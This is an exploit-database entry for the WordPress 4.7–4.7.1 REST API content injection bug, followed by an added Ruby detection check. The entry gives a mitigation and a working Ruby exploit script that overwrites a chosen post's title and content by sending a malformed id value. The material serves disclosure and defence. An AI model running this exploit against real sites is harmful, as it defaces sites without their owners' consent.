Vendor: WordPress
By: Harsh Jaiswal
CVSS: 8,8 (HIGH)
Type: Content Injection
CWE: 20
Product Name: WordPress
Affected Version From: WordPress 4.7
Affected Version To: WordPress 4.7.1
Patch Exists: YES
Platforms Tested: Backbox Ubuntu Linux
Year: 2017

WP Content Injection

This exploit allows an attacker to inject malicious content into a post on a WordPress site by exploiting a vulnerability in the WordPress REST API. The vulnerability affects WordPress versions 4.7 to 4.7.1 and is patched in version 4.7.2. The attacker must know the ID of the post to be modified; a Ruby script then sends a POST request containing the malicious title and content to the REST API route for that post, and the content is injected into the post.

Mitigation:

Upgrade to WordPress version 4.7.2 or later.

Exploit-DB raw data:

# Exploit Title: WP Content Injection
# Date: 31 Jan' 2017
# Exploit Author: Harsh Jaiswal
# Vendor Homepage: http://wordpress.org
# Version: Wordpress 4.7 - 4.7.1 (Patched in 4.7.2)
# Tested on: Backbox ubuntu Linux
# Based on https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
# Credits : Marc, Sucuri, Brute
# usage : gem install rest-client 
# Lang : Ruby


require 'rest-client'
require 'json'

# Prompt for the site base URL and the numeric post ID.
puts "Enter Target URI (With wp directory)"
targeturi = gets.chomp
puts "Enter Post ID"
postid = gets.chomp.to_i

# POST a JSON update to the REST API route for the post. The block returns
# the response as-is, so non-2xx status codes do not raise an exception.
response = RestClient.post(
  "#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
  {
    "id" => "#{postid}justrawdata",
    "title" => "You have been hacked",
    "content" => "Hacked please update your wordpress version"
  }.to_json,
  :content_type => :json,
  :accept => :json
) {|response, request, result| response }

# HTTP 200 means the update was accepted.
if response.code == 200
  puts "Done! '#{targeturi}/index.php?p=#{postid}'"
else
  puts "This site is not Vulnerable"
end
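
A defensive check for the request shape the script above sends, as an added example that is not part of the original exploit entry: it flags write requests to the posts route whose `id` parameter is not a plain integer or differs from the ID in the path. The function names, sample host and sample requests are constructed for illustration; the check generalizes slightly by also reading `id` from the query string and by covering PUT and PATCH.

```ruby
require 'json'
require 'uri'

# Route used by the script above: .../wp-json/wp/v2/posts/<numeric id>
POSTS_ROUTE = %r{/wp-json/wp/v2/posts/(\d+)/?\z}

# Collect every `id` parameter of a request: query string plus JSON body.
def id_parameters(uri, body)
  ids = URI.decode_www_form(uri.query.to_s).select { |k, _| k == 'id' }.map(&:last)
  parsed = JSON.parse(body.to_s)
  ids << parsed['id'].to_s if parsed.is_a?(Hash) && parsed.key?('id')
  ids
rescue JSON::ParserError
  ids # empty or non-JSON body: only the query string is inspected
end

# Returns a reason string for a suspicious post update, or nil if it looks normal.
def suspicious_post_update(method, url, body = nil)
  return nil unless %w[POST PUT PATCH].include?(method.to_s.upcase)
  uri = URI.parse(url)
  route = POSTS_ROUTE.match(uri.path.to_s)
  return nil unless route
  id_parameters(uri, body).each do |value|
    return "non-numeric id parameter #{value.inspect}" unless value.match?(/\A\d+\z/)
    return "id parameter #{value} differs from route id #{route[1]}" unless value == route[1]
  end
  nil
rescue URI::InvalidURIError, ArgumentError
  'unparseable request URL'
end

# Constructed sample requests (host, IDs and bodies are made up).
SAMPLES = [
  ['POST', 'http://blog.example/index.php/wp-json/wp/v2/posts/12', '{"id":"12justrawdata","title":"x"}'],
  ['POST', 'http://blog.example/wp-json/wp/v2/posts/12', '{"id":"99","title":"x"}'],
  ['POST', 'http://blog.example/wp-json/wp/v2/posts/12', '{"id":12,"title":"routine edit"}'],
  ['GET',  'http://blog.example/wp-json/wp/v2/posts/12', nil]
].freeze

SAMPLES.each do |method, url, body|
  puts "#{method} #{url} -> #{suspicious_post_update(method, url, body) || 'ok'}"
end
```

The check needs request bodies, so it belongs where they are visible (a reverse proxy, WAF or application-level logging) rather than in plain access logs.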